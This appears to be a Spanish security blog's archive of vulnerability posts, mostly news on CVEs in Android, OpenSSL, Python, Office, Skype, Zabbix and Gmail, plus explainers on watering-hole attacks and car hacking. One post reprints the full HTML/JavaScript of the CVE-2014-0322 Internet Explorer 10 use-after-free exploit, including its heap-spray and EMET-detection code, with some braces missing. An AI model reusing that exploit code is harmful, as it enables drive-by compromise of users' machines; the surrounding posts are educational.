Este blog ya no está activo, sigue informándote aquí:

Mostrando entradas con la etiqueta Vulnerbilidades. Mostrar todas las entradas
Mostrando entradas con la etiqueta Vulnerbilidades. Mostrar todas las entradas

jueves, 10 de diciembre de 2015

Vulnerabilidades en Android 6.0 y Anteriores

Hoy toca darle un repaso a la nueva actualización de seguridad que ha lanzado Google para los dispositivos Android. 


Últimamente me ha dado por hacer este tipo de entradas ya que las veo muchas mas útiles que muchas otras que hago a diario y a mi ya me gustaría tener este detalle de vulnerabilidades cuando trabajo con ellas. Así que espero que os sean útiles.


Vulnerabilidades:
  • CVE-2015-6616: Un fallo en Mediaserver permite la ejecución remota de código.
  • CVE-2015-6617: Un fallo en Skia también permite la ejecución remota de código.
  • CVE-2015-6619: Un fallo en el Kernel permite la elevación de privilegios.
  • CVE-2015-6633: Un fallo en Display Driver permite la ejecución remota de código.
  • CVE-2015-6634: Un fallo en Display Driver permite la ejecución remota de código.
  • CVE-2015-6618: Un fallo en Bluetooth permite la ejecución remota de código.
  • CVE-2015-6620: libstagefright permite la elevación de privilegios.
  • CVE-2015-6621: SystemUI también permite la elevación de privilegios.
  • CVE-2015-6622: Native Frameworks Library también permite la elevación de privilegios.
  • CVE-2015-6623: Wi-Fi permite la elevación de privilegios
  • CVE-2015-6624: System Server permite la elevación de privilegios
  • CVE-2015-6626: Un fallo en libstagefright permite provocar una fuga de información.
  • CVE-2015-6631: Un fallo en libstagefright permite provocar una fuga de información.
  • CVE-2015-6632: Un fallo en libstagefright permite provocar una fuga de información.
  • CVE-2015-6627: Un fallo en Audio también permite provocar una fuga de información.
  • CVE-2015-6628: Un fallo en Media Framework también permite provocar una fuga de información.
  • CVE-2015-6629: Un fallo en Wi-Fi también permite provocar una fuga de información.
  • CVE-2015-6625: Un fallo en System Server permite la elevación de privilegios.
  • CVE-2015-6630: Un fallo en SystemUI permite provocar una fuga de información.

Productos afectados:
  • Android 6.0 o anteriores.

Solución:

Más información:

Sed Buenos ;) 

miércoles, 23 de julio de 2014

Slide.- Introducción a la Seguridad Informatica. [4] (Vulnerabilidades, Exploits y Actualizaciones)

Ayer, cuando repase la Slide de ayer me di cuenta que había metido mas temario del que tocaba en el punto de las vulnerabilidades. Así que lo que he hecho es dedicarle toda la Slide de ayer al punto de la formación por que me parece que las vulnerabilidades y los exploits son un tema que se ha de tratar de la mano. También he  optado por hacerle caso a Snifer de una vez y aportar un glosarios un poco mas extenso que solo el sombre de los Hackers de sombrero de color y una introducción a CVE.

Working working ... 

Slides Actualizadas: 
Como siempre en el "tocho manual" dejo alguna que otra pincelada mas para que la formación sea mas completa.  Espero que os guste,  a mi me hubiera gustado que un profe me diera todo de esta forma. 
Sed Buenos y aguantad que en tres días acabos las Slides. ;) 

lunes, 21 de julio de 2014

Slide.- Introducción a la Seguridad Informatica. [3] (Vulnerabilidades)

Ya es lunes y volvemos con la serie de Slides para la Formación que tendré que dar en Septiembre y ya que la hago desde zero pues os las cuelgo para que me ayudéis y aprendáis.  Ademas, ya me va bien repasarlo todo desde zero así refresco conocimientos. Bueno, dicho esto,  os dejo el nuevo punto que he hecho hoy. Esta dedicado a aprender que es una vulnerabilidad, cuales hay y como podemos luchar contra ellas. 

Aquí os dejo la presentación y espero que os guste:


También he actualizado el "tocho manual" por si queréis mas información: 
Estas Sildes no hubieran sido posibles sin la gran fuente de información que son:
"Me encantaría que me dejarais en los comentarios opiniones, criticas y mejoras que vosotros le haríais. Así yo también aprendo a hacer mejores slides y la formación estará mas completa."
Slides Antiguas: 


Sed Buenos ;)

jueves, 26 de junio de 2014

CVE-2014-0221.- OpenSSL Remote Denial of Service Vulnerability

Hace mas o menos una semana os hablé de [Qualys SSL Server Test] por la cantidad de servidores que a día de voy aun seguían sin estar parcheados contra la famosa vulnerabilidad en OpenSSL Heartbleed. Pero, hoy me ha hecho gracia ver, en un tweet de snifer todo se ha de decir,  una nueva vulnerabilidad en Open SSL. Vamos, que le están dando fino.


Os explico un poco de lo que es capaz esta vulnerabilidad CVE-2014-0221: 

Un atacante seria capaz, utilizando La función dtls1_get_message_fragment en d1_both.c en OpenSSL para provocar una denegación de servicio (la recursividad y la caída del cliente) a través de un mensaje de saludo DTLS en un hanshake DTLS no válido.

Se recomienda actualizar a las versiones: 
OpenSSL 0.9.8 SSL/TLS users (client and/or server) should upgrade to 0.9.8za. 
OpenSSL 1.0.0 SSL/TLS users (client and/or server) should upgrade to 1.0.0m. 
OpenSSL 1.0.1 SSL/TLS users (client and/or server) should upgrade to 1.0.1h.
Para mas información: 
 Sed Buenos con esto y actualizad ;) 

viernes, 20 de junio de 2014

Python vulnerability.- Reading Arbitrary Process Memory

Ayer, buscando librerías que me permitieran seguir con el script de ayer. Encontré una página llamada [HackerOne] dedicada a promocionar la colaboración entre Hackers y Programadores. Uno programador sube su creación a esta pagina pone unas clausulas para la divulgación de los fallos y lo deja a merced de los hackers que quieran darle fuerte y flojo. Si queréis mas información le dais al enlace anterior.


En esta pagina me he encontrado hoy una vulnerabilidad, ya resuelta, que afectaba a python 2.X como a la versión 3.X por un error en el modulo json  que quien haya jugado un poco con Python sabrá que es un formato de intercambio de datos ligero entre python y Json (Javascript Object Notation).

"Python 2 y 3 son susceptibles a la lectura de la memoria del proceso arbitrario por un usuario o adversario debido a un error en el módulo _json causada por insuficiente de los límites de cheking"

"Los únicos requisitos previos de este ataque es que el atacante es capaz de controlar o influir en los dos parámetros de la función scanstring por defecto: la cadena para ser decodificado y el índice."

"El error se debe a que el usuario pueda suministrar un valor de índice negativo. El valor de índice se utiliza a continuación directamente como un índice para una matriz en el código C; internamente la dirección de la matriz y su índice se añaden entre sí con el fin de producir la dirección del valor que se desea. Sin embargo, mediante el suministro de un valor de índice negativo y sumando esto a la dirección de la matriz, el valor de registro del procesador se envuelve alrededor y el valor calculado se apuntan a una posición en la memoria que no está dentro de los límites de la cadena de suministro, haciendo que la función para acceder a otras partes de la memoria del proceso."
 Si tenéis la misma curiosidad que yo y queréis indagar mas,  os dejo el reporte completo:
Sed Buenos con esto ;) 

martes, 18 de febrero de 2014

(CVE-2014-0322).- Mas De Información Sobre el 0'day De IE

Si os acordáis hace tres días (cuatro depende como los cuentes xD) escribir sobre el nuevo [0'day para IE] el cual había mucha historia por detrás de la cual aun no he podido enterarme. Pero ya puestos a saber mas sobre la historia me dedique a buscar mas información sobre como funcionaba este exploit y la encontré. Me lo baje rápido y empece a mirarlo junto con la explicaciones de [Blackploit] (un blog que os recomiendo encarecidamente.)


Como podéis ver en el .rar solo había un archivo .html, un .swf y otro .as3 y partiendo de la premisa de que es una ataque centrado en IE 10 y Adobe Flash y  que es necesario un "liberación" previa ([use-after-free]) huele mucho tener un .swf (Adobe Flash tampoco defrauda xD) 

Así que eche un repaso al código fuente del .html en busca de algún script o algún embed que diera lugar a la "reproducción" (no se como decirlo mejor) de este Tope.swf y me sorprendieron un par de cosa. 

<html>
<head id="headId">
<title>main page</title>
<script>
function dword2data(dword) { 
var d = Number(dword).toString(16); 
while (d.length < 8) 
d = '0' + d; 
return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4)); 


function developonther(txt) { 
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM"); 
xmlDoc.async = true; 
xmlDoc.loadXML(txt); 
if (xmlDoc.parseError.errorCode != 0) { 
var err; 
err = "Error Code: " + xmlDoc.parseError.errorCode + "\n"; 
err += "Error Reason: " + xmlDoc.parseError.reason; 
err += "Error Line: " + xmlDoc.parseError.line; 
if (err.indexOf("-2147023083") > 0) { 
return 1; 
} else { 
return 0; 
return 0; 
var g_arr = []; 
var arrLen = 0x250; 

function fun() { 

var a = 0; 
for (a = 0; a < arrLen; ++a) { 
g_arr[a] = document.createElement('div') 
}; 
var b = dword2data(0xdeadc0de); 
var c = 0x1a1b2000; 
while (b.length < 0x360) { 
if (b.length == (0x94 / 2)) { 
b += dword2data(c + 0x10 - 0x0c) 
} else if ( 
b.length == (0x98 / 2)) { 
b += dword2data(c + 0x14 - 0x8) 
} else if (b.length == (0xac / 2)) { 
b += dword2data(c - 0x10) 
} else if (b.length == (0x15c / 2)) { 
b += dword2data(0x42424242) 
} else { 
b += dword2data(0x1a1b2000 - 0x10) 
}; 
var d = b.substring(0, (0x340 - 2) / 2); 
try { 
this.outerHTML = this.outerHTML 
} catch (e) {} 
CollectGarbage(); 
for (a = 0; a < arrLen; ++a) { 
g_arr[a].title = d.substring(0, d.length); 
function puIHa3() { 

var bamboo_go = "<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'res://C:\\windows\\AppPatch\\EMET.DLL'>"; 

if (navigator.userAgent.indexOf("MSIE 10.0") > 0) { 
if (developonther(bamboo_go)) { 

return; 
var a = document.getElementsByTagName("script"); 
var b = a[0]; 
b.onpropertychange = fun; 
var c = document.createElement('SELECT'); 
c = b.appendChild(c); 
} else if (navigator.userAgent.indexOf("IE10") > 0) { 
if (developonther(bamboo_go)) { 

return; 

var a = document.getElementsByTagName("script"); 
var b = a[0]; 
b.onpropertychange = fun; 
var c = document.createElement('SELECT'); 
c = b.appendChild(c); 
</script>
<embed src=Tope.swf width=10 height=10></embed>
</head>
</html>
La verdad es que no llego a saber que hace todo el código correctamente, pero esta claro que utiliza el script para embeder el Tope.swf que esta claro que estará preparado para hacer que Adobe Flash nos de la magia que necesitamos. Ademas de tener un ancho y una altura casi menospreciables. 

Una de las cosas que mas me a gustado es la inclusión de la función fun no podemos discutir que se lo estaba pasando bien cuando programaba esto. Otra cosa que mas me gusta son las continuas comprobaciones que hace para ver si el navegador esta utilizando IE10 y la utilización de la variable bamboo_go (Esta ultima me entraña  bastante curiosidad y por mas que he buscado no tengo ni idea del porqué).

Hacia mucho que no hacia una entrada tan didáctica, para mi quiero decir. Sentarme, "analizar" (si se le puede llamar así) el código y intentar entender lo que hace. Yo aprendo mucho de esta manera aunque algunos os parezca una tontería.  

Por ultimo me gustaría recomendaros el blog de Blackploit del cual es fuente de todo este articulo y fuente también de este material. Os dejo el enlace al blog aquí abajo. 

sábado, 15 de febrero de 2014

IE Nunca Defrauda.- Nuevo 0'Day IE10

Hace casi un año hablamos sobre una famosa vulnerabilidad en la [version 8 de Internet Explorer]  y de que estaba siendo usado en la técnica llamada [Watering Hole Attack]. Pues ayer se volvió a repetir pero esta vez tenemos la vulnerabilidad en la versión 10. Aunque con algo de historia o "especulación" debido a que fué servida desde la pagina web de U.S. Veterans of Foreign Wars.

Jerome Segura de la empresa Malwarebytes fue capaz de reproducir una infección exitosa en Windows 7 con Internet Explorer 10 y la última versión de Flash Player. Como señala Segura, el fallo de seguridad es "un error de uso después de liberación que da el atacante acceso directo a la memoria en una dirección arbitraria, usando un archivo corrupto de Adobe Flash, siendo capaz de pasar la protección Space Layout Randomization (ASLR) y Data Execution Prevention (DEP)".
Link al CVE de la vulnerabilidad:
Fuente y mas información sobre la historia que hay detrás de esta vulnerabilidad : 
Sed Buenos y Actualizad vuestro IE a la versión 11 ;) 

jueves, 30 de enero de 2014

DVWA.- Damn Vulnerable Web Application

Hace ya bastante tiempo os hable de [Metasploitable] una distribución para reventarla como quisieras utilizando Metasploit, pues hoy os voy ha hablar de una aplicación web para que podáis darle fuerte y duro con todo lo referente a seguridad web. Esta aplicación me ha ayudado mucho a entender la seguridad que debería tener una web y ha sido mi banco personal de probas durante bastante tiempo. 


Advierto que la instalación es algo complicada, os dejo un video-tutorial por si tenéis algún problema. 


Si os atrevéis a descargarlo os dejo el enlace aquí abajo:

Sed Buenos ;) 

martes, 7 de enero de 2014

Url Redirection Vulnerability.- Facebook con PoC

Hace tiempo que no hacia experimentos en este blog pero después de la bronca del señor [Snifer] en los comentarios de [la entrada de hace dos] días me he puesto manos a la obra.  Hoy os traigo una vulnerabilidad de Url Redirection para Facebook con una prueba de concepto que aun a día de hoy esta vigente. 


Una vulnerabilidad de Url Redirection es una técnica para hacer que una página web esté disponible en más de una URL de direcciones. Cuando un navegador web intenta abrir un URL que ya ha sido redirigida, se abre una página con una URL diferente.

En este caso Facebook tiene un par de vulnerabilidades tanto en su apps.facebook.com como facebook.com



Prueba de Concepto: 



Sed Buenos con esto ;)

Fuente: http://www.blackploit.com/

miércoles, 4 de diciembre de 2013

Videos.- Inspeccionar Elemento, Flickr y el Arte de la Descarga de Fotos

Hace tiempo que me puse a inspeccionar la multitud de paginas web para subir fotografías como Instagram, Flickr, 500 px , etc y me di cuenta de que todas ofrecían una falsa seguridad. Por eso,  me decidí a escribir el que ahora es la entrada mas popular de este blog [Descargando Fotos de Instagram, Flickr y 500px .- ¿De verdad Están Seguras Mis Fotos?] y acto seguido (y esta es la parte que no sabéis) grave un par de videos para Youtube para que la gente viera lo fácil que era extraer esas fotografías.


Tengo a mi alrededor mucha gente relacionada con el mundo de la fotografía y que no le gustaría que su trabajo fuera copiado por terceros y quería demostrarles lo poco seguras que son este tipo de pagina. Tampoco lo considere como una vulnerabilidad propiamente dicha ya que con aprender lo básico de Html 5 o en algunos caso haberte pasado un rato tocando botones en la opción, "Inspeccionar elemento" de Google Chrome pues no era para darle mucho bombo. 

Pero, hoy leyendo mi ración de blogs diaria (si, es como una droga mas o menos XD)  ha habido [un entrada especial que me ha llegado] y por esta razón he decidido compartirlos con la comunidad para aquel que le interese. 

Como Descargar fotos en Flickr: 
  • Mozilla Firefox: 

  • Google Chrome:

Este método es exportable tanto en Instagram, como en 500 px. Todos comprobados a día de hoy. Espero que os gusten. 

Sed Buenos Con Esto ;) 

viernes, 22 de noviembre de 2013

Gmail.- Vulnerabilidad CSRF + XSS + Flow ByPass en Reset Password

Hoy he ido a parar con una vulnerabilidad en uno de los servicios de correo electrónico mas conocidos en el mundo, Gmail. Este fallo de seguridad ya ha sido reportado pero merece la pena el visionado del vídeo que han subido para explicar esta vulnerabilidad. 


Esta vulnerabilidad ha sido encontrada por Oren Hafif el cual era capaz de crear un phishing para aprovechar una serie de fallos de seguridad (Cross-site request forgery (CSRF), Cross-site scripting (XSS) y Flow Bypass(de este ultimo he de leerme algún paper por que no lo he entendido del todo)) para engañar a la victima para que entregara su contraseña. Si queréis mas información os dejo el vídeo del que os he hablado arriba.


Sed Buenos con esto y desconfiad de todos los correos electrónicos sospechosos. ;) 

domingo, 10 de noviembre de 2013

Microsoft.- Office y La Vulenrabilidad CVE-2013-3906

El pasado 5 de noviembre Microsoft dio a conocer en un Security Advisory una vulnerabilidad bastante curiosa en Microsoft Office que aprovecha el fallo en un componente en Microsoft Graphics para ejecutar remotamente código arbitrario en nuestros equipos.




"Esta vulnerabilidad, existe en la forma de los componentes afectados manejar imágenes TIFF especialmente diseñados. Un atacante podría aprovechar esta vulnerabilidad si convence a un usuario para obtener una vista previa o abrir un mensaje de correo electrónico especialmente diseñado, abra un archivo especialmente diseñado, o navegue contenido web especialmente diseñado. Un atacante que aprovechara esta vulnerabilidad podría obtener los mismos derechos de usuario que el usuario actual. Los usuarios cuyas cuentas estén configuradas con pocos derechos de usuario en el sistema correrían un riesgo menor que aquellos que cuenten con derechos de usuario administrativos."

Software afectado:


Sistema Operativo Windows

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2 
  • Windows Server 2008 para el Servicio de Sistemas de 32 bits Pack 2 
  • Windows Server 2008 para x64 Service Pack 2 Sistemas 
  • Windows Server 2008 para sistemas con Itanium Service Pack 2 
  • Windows Server 2008 para sistemas de 32 bits Service Pack 2 (instalación de Server Core) 
  • Windows Server 2008 para x64 Service Pack 2 sistemas (instalación de Server Core) 
Microsoft Office Suite y software 
  • Microsoft Office 2003 Service Pack 3 
  • Microsoft Office 2007 Service Pack 3 
  • Microsoft Office 2010 Service Pack 1 (ediciones de 32 bits) 
  • Microsoft Office 2010 Service Pack 2 (ediciones de 32 bits) 
  • Microsoft Office 2010 Service Pack 1 (ediciones de 64 bits) 
  • Microsoft Office 2010 Service Pack 2 (ediciones de 64 bits) 
  • Paquete de compatibilidad de Microsoft Office Service Pack 3 

Plataformas Microsoft Comunicación y Software
  • Microsoft Lync 2010 (32-bit) 
  • Microsoft Lync 2010 (64-bit) 
  • Microsoft Lync 2010 Attendee 
  • Microsoft Lync 2013 (32-bit) 
  • Microsoft Lync 2013 Basic (32-bit) 
  • Microsoft Lync 2013 (64-bit) 
  • Microsoft Lync 2013 Basic (64-bit)
Como ya sabeis normamente Microsoft sule lanzar sus paquetes Fix it para arreglar este tipo de vulnerabilidades. Los cuales supongo que utilizareis todos. Os dejo abajo el Fix It para esta vulnerabilidad para los despistados y para mas información os dejo el Security Advisory el cual habla largo y tendido sobre esta vulnerabilidad.  
Sed Buenos con esto ;) 

sábado, 5 de octubre de 2013

CVE-2013-5572.- Zabbix 2.0.5 Password Leak

Hoy me ha sorprendido, al hacer un repaso a mir redes sociales, un tweet que tenia un enlace a esta vulnerabilidad cuyos autores son Germán Sánchez, Pablo González y Chema Alonso, todos ellos grandes de la Seguridad Informatica en España. No me he podido estar de curiosear en ella y aprender un poco de que iba. 


Primeramente Zabbix es una herramienta de monitorización de codigo libre, la cual nos ofrece todo lo siguiente: 
  • Detección automática de servidores y dispositivos de red
  • Descubrimiento de bajo nivel
  • Control distribuido con web de administración centralizada
  • Soporte para votación y mecanismos de retención
  • Software de servidor para Linux, Solaris, HP-UX, AIX, Free BSD, Open BSD, OS X
  • Agentes nativos de alto rendimiento (software de cliente para Linux, Solaris, HP-UX, AIX, Free BSD, Open BSD, OS X, Tru64/OSF1, Windows NT 4.0, Windows 2000, Windows 2003, Windows XP, Windows Vista)
  • Sin agentes de vigilancia
  • Autenticación segura de los usuarios
  • Permisos de usuario flexibles
  • Interfaz basada en web
  • Notificación por correo electrónico flexible de los eventos predefinidos
  • Vista de alto nivel (de negocios) de los recursos supervisados
  • Registro de auditoría
Este error permite ver la contraseña de un usuario de zabbix , si este usuario tiene una sesión abierta en la consola de administración. Esta vulnerabilidad permite una elevación de privilegios que afecta a la forma en recursos de Active Directory en redes empresariales.

Os dejo el "paper"/ vulnerabilidad aquí abajo no tiene desperdicio:  

lunes, 16 de septiembre de 2013

El Lado Claro Oscuro De Encontrar y Reportar Vulnerabilidades

Muchas son las anécdotas de Hacker que tras reportar un fallo de seguridad a una compañía, esta al menos de agradecerlo como haría todo hijo de vecino, le ha dedicado una sonora denuncia. Por que esta claro que si vosotros sois mis vecinos y veo que tenéis la puerta de vuestro piso abierta debo pasar y dejar que entre cualquiera al menos de asomar la cabeza, llamaros y advertiros de su estado. Hay que aclarar que muchas empresas ya tienen su plan de "recompensas" para los Hackers/Security Researchers que descubran agujeros de seguridad, hay otras empresas que aún lo siguen viendo como un crimen. Por eso me ha hecho gracia la siguiente tira. 


Sed Buenos ;) 

viernes, 26 de julio de 2013

Ya Es Posible Vulnerar Y Controlar Un Coche.

En Octubre del año pasado dediqué una de las entradas de este blog a una noticia sobre la posibilidad de que los [Cibercriminales pudieran, también, robar coches]. En la cual, dije que me imaginaba a los delincuentes sacando coches de gama alta como James Bond en sus películas. Bueno, pues nada mas lejos que eso los investigadores [Charlie Miller] y [Chris Valasek] han ido un paso mas para adelante deshabilitando el sistema de frenado de un Toyota Prius.


"En la demostración Miller y Valasek se conectan al vehículo a través de un conector, sin embargo y de manera independiente, en 2011, investigadores de las universidades de Washington y California consiguieron el mismo grado de control vulnerando la red WiFi del vehículo. Es decir, ni siquiera es necesario tener acceso físico al coche objetivo para controlar sus sistemas críticos."
La demostración fue hecha en la BlackHat el dia 21 de agosto de este año. El sistema también puede ser vulnerado  mediante Bluetooth, por aplicaciones especificas del fabricante, por conexiones telefónicas e incluso con un cd de música. 

No se vosotros, pero a mi esto me asusta un pelin, suerte que tanto [Charlie Miller] como [Chris Valasek] son de los buenos y ya deben han reportado el fallo de seguridad a la empresa ... 

Os aconsejo que miréis la fuente de la noticia para mas información:
http://www.laflecha.net/canales/seguridad/noticias/investigadores-consiguen-vulnerar-y-controlar-los-sistemas-de-un-coche/

jueves, 9 de mayo de 2013

¿Watering Hole Attack? ¿Que es eso?

Hace un par de días cuando revise la noticia para hablaros del [0'Day en IE 8 confirmado] por Microsoft, el cual ahora ya tiene un [parche] provisional, hubo un termino que no había visto en mi vida o no había querido verlo. Se trata del ataque Watering Hole Attack y como cree este blog también para aprender yo, os lo voy a explicar a mi manera. 


Un ataque De Watering Hole tiene cuatro partes fundamentales: un ciberdelincuente, una web, una victima y el malware.

Simplemente el cibercriminal tendrá que encontrar la manera de vulnerar una pagina web y como es un ataque a porcentaje escogerá paginas populares (como en el caso de Apple). Una vez el cibercriminal consiga poder introducir código propio en esa web  la modificará de tal manera para que una victima, al visitar dicha pagina, se redirija a una ruta (manteniendo la pagina para atrapar a nuevas victimas) donde el malware comprobará las aplicaciones instaladas y explotara las vulnerabilidades que encuentre en el equipo de la victima. Una vez infectado y dependiendo del malware el cibercriminal tendría el control del equipo de la victima.

Como podréis suponer todo no es tan simple y esta técnica requiere de los conocimientos del cibercriminal para vulnerar paginas web de una cierta reputación, las cuales seguramente hayan pasado por algún Pentest (Penetration Test).

lunes, 6 de mayo de 2013

Internet Explorer 8.- 0'day confirmado.

Recordemos que un 0'Day es una vulnerabilidad (un fallo de seguridad en nuestro sistema) para el que aun no se ha encontrado una solución. Esto, hace que se [coticen con precios desorbitados] en ciertos mercados. 


Hoy le ha tocado el turno a Intertet Explorer 8, confirmado por Microsoft esta vulnerabilidad a ser analiza y a dejar caer [muchísima información al respecto]. Exploit funciona tanto en XP, vista, 7, 8. Así que os recomendamos actualizar vuestro Internet Explorer por que este exploit ya ha entrado a formar parte de la lista de metasploit y se abre la veda hasta que Microsoft no saque un nuevo parche. 
"La web del Departamento de Trabajo de los EE.UU. fue comprometida y el código malicioso propagado era capaz de detectar y desactivar algunos productos antivirus. Algunas personas ha dicho que esta es la vulnerabilidad ya parcheada CVE-2012-4792 pero el exploit actual (conocido como CVE-2013-1347 - DoL - Department of Labor) no utiliza este objeto en absoluto"
Mañana tratare de explicaros la metodología de este 0'Day y pasado intentaremos hacer algunso experimentos con el que hace mucho que no os enseño nada chulo con metasploit. 

Mas información sobre el 0'day y fuente de la noticia:

viernes, 22 de marzo de 2013

Skype Vulnerabilidad.- Elevación De Privilegios En Windows

Hace tiempo que no hablamos de vulnerabilidades, así que manos en la masa. Ademas, la de hoy a sido bastante sonada y vale la pena comentarla. Este fallo nos permitiría ejecutar código arbitrario (vamos, lo que me salga a mi de los mismísimos xD) sin tener privilegios. Esto se produce tras el Hijaking de un DLL ("secuestrar" un DLL) pudiendo meter nuestro código en el y hacer que sea cargado por la función "Click To Call". 


"Existe un error en la aplicación Click to Call de Skype (c2c_service.exe) al no restringir correctamente las rutas de búsqueda para las librerías DLL que utiliza. Además el directorio donde se encuentra esta aplicación dispone de permisos de escritura para cualquier usuario. Para Windows XP el directorio donde se instala Click to Call es C:\Documents and Settings\All Users\Application Data\Skype\Toolbars\Skype C2C Service, mientras que para Windows 7 es C:\ProgramData\Skype\Toolbars\Skype C2C Service"
Para los que preguntéis ... Si, ya tenéis la nueva versión en la web para que actualicéis lo mas rápido posible ;)

martes, 19 de marzo de 2013

Smart TV.- El Metodo3 Se Queda Corto xD

Hace tiempo que estos televisores están entre nosotros. Muchas veces cuando pasaba por al lado de una tienda de tecnología random y las veía tan bien expuestas y con una publicidad para nada discreta, me venia a la mente una pregunta ¿Si ahora se conectan a Internet, podremos espiar la programación de nuestros vecinos? Naturalmente lo pensaba en broma, pero después de ver las siguientes diapositivas mi idea no era tan descabellada. (Hasta las Smart TV llevan [cámara integrada] así que con un poco de tiempo lo del "metedo3" nos parecerá un juego de niños.)


Este trabajo fue presentado por SeungJin Lee y Seungjoo Kim en las conferencias de [CanSecWest] de Vancouver. La verdad es que no tiene desperdicio, el repaso que le dan al Smart TV es digno y muy curioso. Pero sin entrar en [modo panico] lo mas sorprendente  aunque no tendría que serlo, es que es vulnerable a todos los ataques "clásicos". Para todos los que tengáis curiosidad, os dejo la dirección para que podaris hecharle un ojo.


PD: Esto demuestra la teoría de Lorenzo. "Si dejas una IP en Internet es como sacar el culo por la ventana, nunca sabes lo que te puede pasar" xD

lunes, 18 de marzo de 2013

Java.- Contador De Exploits/0-day

En estos meses las vulnerabilidades en Java han sido el [eje principal] de este blog y hemos hecho practicas de como utilizar estas vulnerabilidades con [Windows 7 y Windows 8]. Hasta día de hoy aun se ha podido erradicar los grandes fallos del producto, lo cual ha dado paso a la "comunidad" a crear paginas Webs algo divertidas para concienciar a Oracle de que tiene que invertir algo mas en seguridad para tapar esas vulnerabilidades. 


La web que mas me ha gustado es java-0day.com/ no solo se dedica a contabilizar el numero de exploits y vulnerabilidades que van saliendo sino que también los días que tarda Oracle en lanzar una solución. Ademas les ponen puntuación XD. Ademas, si realmente quieres saber si ahora mismo hay un 0-day en Java tienes la siguiente dirección istherejava0day.com/  Esta claro porqué tienes que desactivar Java si aun lo tienes